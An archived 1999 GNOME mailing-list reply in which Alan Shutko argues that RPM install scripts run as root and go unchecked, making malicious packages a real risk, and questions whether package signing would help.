Re: Viruses

From: Alan Shutko <ats acm org>
To: gnome-list gnome org
Subject: Re: Viruses
Date: 06 Jul 1999 17:05:34 -0500

jasta <jasta@gotlinux.org> writes:

> You are stupid.  There can't exactly be too damn many "viruses"
> (most are called exploits anyway because UNIX people don't wanna
> destroy files they wanna own them) because nobody is stupid enough
> to run anything as root.

If anyone is stupid, it's you.  But maybe you just didn't reaa the
post very well.  Here's the gist.

* Package installations nearly always have to be done as root.

* RPMs (and I think other packaging systems) can run scripts during
  the installation.

* People rarely (if ever) look at the pre and post-install scripts of
  RPMs.

* Malicious people could use those scripts to infect or attack a
  system, since they're done automatically and usually, as root.

This is a very good point, and you really should have read it before
giving a knee-jerk response.

Lauris, I am not sure either of your ideas would really help.  Signed
packages won't do much good (since anyone could sign one).  It might
make people a little bit more picky about who their packages came
from, but then again, they might just see "this rpm is signed by
random key, so it should be safe" and not worry about it.

-- 
Alan Shutko <ats@acm.org> - Looking for a job in Long Island!
Check http://rescomp.wustl.edu/~ats/ for a resume.
I'll pretend to trust you if you'll pretend to trust me.

Follow-Ups:
- Re: Viruses
  - From: mark
- Re: Viruses
  - From: jasta

References:
- Viruses
  - From: lauris
- Re: Viruses
  - From: jasta

[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]